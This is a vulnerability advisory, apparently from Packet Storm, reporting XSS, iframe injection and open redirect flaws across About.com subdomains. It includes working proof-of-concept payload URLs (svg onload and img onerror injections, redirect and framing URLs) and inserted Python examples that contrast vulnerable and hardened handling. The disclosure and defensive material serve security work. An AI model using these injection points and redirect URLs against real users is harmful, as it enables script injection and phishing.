About.com Cross Site Scripting

2015-02-02T00:00:00
ID PACKETSTORM:130211
Type packetstorm
Reporter Jing Wang
Modified 2015-02-02T00:00:00

Description

                                        
                                            `*About Group (about.com <http://about.com>) All Topics (At least 99.88%  
links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com  
Open Redirect Security Vulnerabilities*  
  
  
  
  
*Vulnerability Description:*  
All About.com "topic sites" are vulnerable to XSS (Cross-Site Scripting) and  
Iframe Injection (Cross Frame Scripting) attacks, so every sub-domain of  
about.com is affected. Using a self-written program, 94357 links were  
tested; only 118 of them did not belong to the topic (Metasite) links.  
Some about.com main pages are vulnerable to XSS as well. This means that no  
more than 0.125% of the links are unaffected, and at least 99.875% of About  
Group's links are vulnerable to XSS and Iframe Injection attacks. In  
About.com's structure the main domain is little more than a cover page, so  
very few links belong to it.  
  
The About.com main page's search field is also vulnerable to XSS attacks.  
This means all domains related to about.com are vulnerable to XSS attacks.  
  
The Iframe Injection vulnerability can also be used to mount DoS  
(Denial-of-Service) attacks against other websites.  
  
Finally, some "Open Redirect" vulnerabilities related to about.com are  
introduced. There may be a large number of other Open Redirect  
vulnerabilities that were not detected. Since About.com is trusted by some  
other websites, those vulnerabilities can be used to perform a "Covert  
Redirect" against these websites.  
  
  
*Vulnerability Disclosure:*  
These vulnerabilities were reported to About on Sunday, Oct 19, 2014. No  
one replied, and as of this writing they are still unpatched.  
  
  
*Vulnerability Discoverer:*  
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and  
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),  
Singapore.  
http://www.tetraph.com/wangjing  
  
  
*(1) Some Basic Background*  
  
*(1.1) Domain Description:*  
http://www.about.com/  
  
"For March 2014, 61,428,000 unique visitors were registered by comScore for  
About.com, making it the 16th-most-visited online property for that month."  
(The New York Times)  
  
"About.com, also known as The About Group (formerly About Inc.), is an  
Internet-based network of content that publishes articles and videos about  
various subjects on its "topic sites," of which there are nearly 1,000. The  
website competes with other online resource sites and encyclopedias,  
including those of the Wikimedia Foundation" (Wikipedia)  
  
"As of May 2013, About.com was receiving about 84 million unique monthly  
visitors." (TechCrunch. AOL Inc.)  
  
"According to About's online media kit, nearly 1,000 "Experts" (freelance  
writers) contribute to the site by writing on various topics, including  
healthcare and travel." (About.com)  
  
  
  
  
*(1.2) Topics Related to About.com*  
"The Revolutionary About.com Directory and Community Metasite. Hundreds of  
real live passionate Guides covering Arts, Entertainment, Business,  
Industry, Science, Technology, Culture, Health, Fitness, Games, Travel,  
News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms,  
Education, Computers, Hobbies and Local Information." (azlist.about.com)  
  
About.com - Sites A to Z  
Number of Topics  
A: 66  
B: 61  
C: 118  
D: 49  
E: 33  
F: 57  
G: 39  
H: 48  
I: 32  
J: 15  
K: 13  
L: 36  
M: 70  
N: 26  
O: 23  
P: 91  
Q: 4  
R: 32  
S: 104  
T: 47  
U: 12  
V: 9  
W: 43  
X: 1  
Y: 4  
Z: 1  
SUM: 1039  
  
Reference:  
azlist.about.com/  
  
In fact, those are not all of about.com's topics. Some topics are not  
listed there, such as:  
http://specialchildren.about.com  
  
So there are more than 1000 topics related to about.com.  
  
  
*(1.3) Result of Exploiting XSS Attacks*  
"Exploited XSS is commonly used to achieve the following malicious results  
Identity theft  
Accessing sensitive or restricted information  
Gaining free access to otherwise paid for content  
Spying on user’s web browsing habits  
Altering browser functionality  
Public defamation of an individual or corporation  
Web application defacement  
Denial of Service attacks (DOS)  
" (Acunetix)  
  
  
*(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities*  
"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific  
cross-frame-scripting bug in a web browser to access private data on a  
third-party website. The attacker induces the browser user to navigate to a  
web page the attacker controls; the attacker's page loads a third-party  
page in an HTML frame; and then JavaScript executing in the attacker's page  
steals data from the third-party page." (OWASP)  
  
"XFS also sometimes is used to describe an XSS attack which uses an HTML  
frame in the attack. For example, an attacker might exploit a Cross Site  
Scripting Flaw to inject a frame into a third-party web page; or an  
attacker might create a page which uses a frame to load a third-party page  
with an XSS flaw." (OWASP)  
  
  
*(1.5) Basics of Open Redirect (Dest Redirect Privilege Escalation)  
Vulnerabilities*  
"An open redirect is an application that takes a parameter and redirects a  
user to the parameter value without any validation. This vulnerability is  
used in phishing attacks to get users to visit malicious sites without  
realizing it." (OWASP)  
  
Open redirect is listed in the OWASP Top 10. The general consensus is that  
"avoiding such flaws is extremely important, as they are a favorite target  
of phishers trying to gain the user's trust."  
  
  
*(2) About Group About.com All Topics (At least 99.88% links) Vulnerable to  
XSS (Cross-Site Scripting) Security Attacks*  
  
  
  
*Vulnerability description:*  
  
A method was found to attack About.com users with XSS.  
  
All links under the topics of about.com can be used for this attack.  
  
Append "/lr/" to any About.com sub-domain, then append either arbitrary  
characters followed by the script, or the script directly. The structure is  
"http://subdomain.about.com/lr/*/script_code".  
  
  
The vulnerability can be exploited without user login. Tests were performed  
on Mozilla Firefox (26.0) on Ubuntu (14.04) and Microsoft IE (9.0.15) on  
Windows 7.  
  
  
  
*POC Codes, e.g.*  
/"><svg/onload=alert(/justqdjing/)>  
http://ipod.about.com/lr/ipad_how-tos/9033"><svg/onload=alert(/justqdjing/)>  
http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/  
"><svg/onload=alert(/justqdjing/)>  
http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/  
"><svg/onload=alert(/justqdjing/)>  
http://dc.about.com/lr/shopping/a/BlkFriday.htm/  
"><svg/onload=alert(/justqdjing/)>  
http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/  
"><svg/onload=alert(/justqdjing/)>  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be  
  
*Blog Detail:*  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html  
http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/  
  
  
*(3) About Group About.com Main Page's Search Field XSS (Cross-Site  
Scripting) Security Vulnerabilities*  
  
  
*Vulnerability description:*  
  
About Group has a security problem that can be exploited by XSS (Cross-Site  
Scripting) attacks.  
  
The vulnerability occurs in the about.com main page's search field, e.g.  
http://www.about.com/?q=googleandroidsystem  
  
  
*POC Codes, e.g.*  
"--/>"><img src=x onerror=prompt(/tetraph/)>  
http://www.about.com/?q="--/>"><img src=x onerror=prompt(/tetraph/)>  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be  
  
*Blog Details:*  
http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/  
http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html  
  
  
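Both PoCs above (the "/lr/" path in section 2 and the search term in section 3) work for the same reason: a request value is copied into the HTML response without encoding, so a double quote closes the attribute it was placed in and a `>` closes the tag. The following is an added example, not code from the advisory or from About.com. `TEMPLATE`, `render_vulnerable`, `render_hardened` and `injected_tags` are hypothetical names standing in for a server that reflects a trailing path segment and the search term `q` into attribute values; the two payload strings are the ones quoted in the advisory, used here only as test input.

```python
import html
import re

# Payloads quoted in the advisory, used here only as test input.
PATH_PAYLOAD = '/"><svg/onload=alert(/justqdjing/)>'
QUERY_PAYLOAD = '"--/>"><img src=x onerror=prompt(/tetraph/)>'

# Hypothetical page fragment: the trailing path segment and the search term
# are both reflected inside double-quoted attribute values.
TEMPLATE = '<a href="/lr{path}">continue</a> <input name="q" value="{q}">'


def render_vulnerable(path: str, q: str) -> str:
    """Reflects both inputs verbatim. A double quote in the input closes the
    attribute value and '>' closes the tag, so markup from the request becomes
    markup in the document (the defect the advisory reports)."""
    return TEMPLATE.format(path=path, q=q)


def render_hardened(path: str, q: str) -> str:
    """Encodes for the HTML attribute context: & < > " ' become entities, so
    the input cannot leave the attribute value it was placed in."""
    return TEMPLATE.format(path=html.escape(path, quote=True),
                           q=html.escape(q, quote=True))


def tag_names(fragment: str) -> set:
    """Names of all opening tags in an HTML fragment."""
    return set(re.findall(r"<([a-zA-Z][a-zA-Z0-9]*)", fragment))


def injected_tags(rendered: str) -> set:
    """Tags in the rendered output that the template itself does not emit.
    A non-empty result means request data was interpreted as markup."""
    return tag_names(rendered) - tag_names(TEMPLATE)


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        out = render(PATH_PAYLOAD, QUERY_PAYLOAD)
        print(f"{label}: injected tags = {sorted(injected_tags(out))}")
        print("  " + out)
```

Attribute-context encoding is sufficient here only because the template places both values inside quoted attributes; the same value written into a URL, a script block or an event handler needs that context's encoding instead. The `injected_tags` comparison is also a cheap regression check: render every reflected parameter with a marker containing `"<>` and fail the build if any tag appears that the template did not emit.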
*(4) About Group About.com All Topics (At least 99.88% links) Vulnerable to  
Iframe Injection (Cross Frame Scripting) Security Attacks*  
  
  
  
*Vulnerability description:*  
About Group has a security problem that can be exploited by Iframe  
Injection (Cross Frame Scripting) attacks.  
  
  
The vulnerability occurs in the about.com "offsite.htm" page via the "zu"  
parameter, e.g.  
http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//facebook.com/yahoo  
  
Use "http://whitehatpost.blog.163.com/" for the following test.  
  
The vulnerabilities can be exploited without user login. Tests were  
performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox  
(34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on  
Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.  
  
  
*Vulnerable URLs:*  
http://homerenovations.about.com/od/fundingyourrenovation/tp/8-Remodels-That-Maximize-Curb-Appeal-For-Higher-Selling-Price.htm  
http://publishing.about.com/od/Childrens-and-YA-Books/fl/A-Literary-linkedin-Agents-ebay-Advice-Hao123-to-Childrens-and-Bing-Sohu-YA-Dailymail-Authors-Snapdeal.htm  
http://chinesefood.about.com/od/chickenrecipes/tp/chicken-stir-fry-flipkart-adobe-alipay-pork-dropbox-blogger-github-jd-chinadaily-huffingtonpost-Livedoor-Buzzfeed-Themeforest-Godaddy.htm  
http://menshair.about.com/od/facialhair/qt/growbeard-ask-360cn-mailru-gmw-googleleadservices-bbc-pornhub-peoplecn-rakuten-nicovideo-dailymotion-1-dmm-deviantart.htm/  
http://jobsearch.about.com/od/coverletters/a/types-sogou-outbrain-booking-chase-pixnet-reddit-pinterest-vk-msn-imdb-of-cover-qq-letters-bankofamerica-twitter-Wikia-Etsy.htm  
http://testprep.about.com/od/The-Redesigned-PSAT/fl/Redesigned-PSAT-101-Flickr-Globo-Xnxx-Tudou-Yelp-Douban-Ameblo-33-Vimeo-Ettoday-Redtube-Directrev-Salesforce-Coccoc.htm  
  
  
*POC:*  
http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com  
http://inventors.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com  
http://sbinformation.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com/security  
http://ancienthistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//inzeed.com/security  
http://specialchildren.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be  
  
*Blog Details:*  
http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/  
http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html  
  
  
*(5) About (about.com <http://about.com>) Open Redirect Multiple (Dest  
Redirect Privilege Escalation) Security Vulnerabilities*  
  
  
The vulnerabilities can be exploited without user login. Tests were  
performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox  
(34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on  
Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.  
  
  
One webpage is used for the following tests. Its address is  
"http://www.inzeed.com/kaleidoscope/". Suppose that this webpage is  
malicious.  
  
  
*Vulnerable URL 1:*  
  
http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist  
  
*POC:*  
http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html  
  
  
  
  
*Vulnerable URL 2:*  
http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://paypal.com/imgur/xinhuanet  
  
*POC:*  
http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow  
  
  
  
  
*Vulnerable URL 3:*  
http://wzus1.index.about.com/r?t=v&d=im&u=http%3A%2F%2Ft.co%2fxvideos%2fsoso%2f%naver%2fkickass.so  
  
*POC:*  
http://wzus1.index.about.com/r?t=v&d=im&u=http://www.diebiyi.com/xhamster/diply/onclickads.net  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be  
  
*Blog Details:*  
http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/  
http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html  
  
  
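Sections 4 and 5 come down to one pattern: a request parameter ("zu" for offsite.htm and clk.about.com, "u" for snf.htm and the wzus1 redirector) names a destination that the site then frames or redirects to without checking it. The following is an added example, not code from the advisory or from About.com: `redirect_unvalidated` is the weak behaviour and `redirect_validated` the hardened one, and the `ALLOWED_HOSTS` allowlist, the function names and the fallback path are hypothetical. It is exercised against two URLs quoted in the advisory plus constructed edge cases that go beyond the page's own PoCs (scheme-relative targets, `javascript:` targets, look-alike hosts and userinfo tricks), since those are the bypasses an allowlist check is most often tested with.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Parameter names the advisory quotes as carrying the destination.
DESTINATION_PARAMS = ("u", "zu")

# Hypothetical allowlist: the only hosts this site will redirect to or frame.
# Exact match or a subdomain of an entry; a host merely containing the string
# (about.com.evil.example) does not qualify.
ALLOWED_HOSTS = ("about.com",)

# URLs quoted in the advisory (vulnerable URL 1 and the offsite.htm example).
ADVISORY_SNF = "http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist"
ADVISORY_OFFSITE = ("http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya"
                    "&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1"
                    "&zu=http%3A//facebook.com/yahoo")
# Constructed request whose destination stays on an allowlisted host.
CONSTRUCTED_INTERNAL = "http://www.about.com/snf.htm?u=http://ipod.about.com/od/x.htm"


def destination_from(request_url: str) -> Optional[str]:
    """Extracts the destination parameter. parse_qs already percent-decodes,
    so the value is deliberately not decoded a second time: double decoding
    is itself a common way these checks get bypassed."""
    params = parse_qs(urlsplit(request_url).query)
    for name in DESTINATION_PARAMS:
        if name in params:
            return params[name][0]
    return None


def redirect_unvalidated(request_url: str) -> Optional[str]:
    """The weak behaviour the advisory describes: whatever the parameter
    names is where the user is sent (or what gets loaded in the frame)."""
    return destination_from(request_url)


def host_allowed(host: str) -> bool:
    """Exact or subdomain match against the allowlist, case-insensitive."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def redirect_validated(request_url: str, fallback: str = "/") -> str:
    """Hardened behaviour: honour only absolute http(s) destinations on an
    allowlisted host; everything else goes to a fixed local fallback rather
    than echoing the rejected value (which would create a new reflection)."""
    target = destination_from(request_url)
    if target is None:
        return fallback
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        return fallback   # rejects javascript:, data: and scheme-relative //host
    if "@" in parts.netloc or "\\" in parts.netloc:
        return fallback   # userinfo and backslash forms confuse parsers vs browsers
    if not parts.hostname or not host_allowed(parts.hostname):
        return fallback
    return target


if __name__ == "__main__":
    for url in (ADVISORY_SNF, ADVISORY_OFFSITE, CONSTRUCTED_INTERNAL):
        print("unvalidated ->", redirect_unvalidated(url))
        print("validated   ->", redirect_validated(url))
```

For the framing case in section 4 the same check runs before the `zu` value is written into an iframe `src`; the other direction of XFS quoted in (1.5), a third party framing the site's own pages, is addressed separately by sending `X-Frame-Options` or a CSP `frame-ancestors` directive on those pages. Where a redirector must reach arbitrary external sites, the usual replacement for an allowlist is a signed token that maps to a server-side stored URL, so the destination never travels in the request at all.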
*Blog Details:*  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html  
http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-iframe-injection-security-attacks-about-com-open-redirect-security-vulnerabilities/  
  
  
--  
Wang Jing,  
Division of Mathematical Sciences (MAS),  
School of Physical and Mathematical Sciences (SPMS),  
Nanyang Technological University (NTU),  
Singapore.  
http://www.tetraph.com/wangjing/  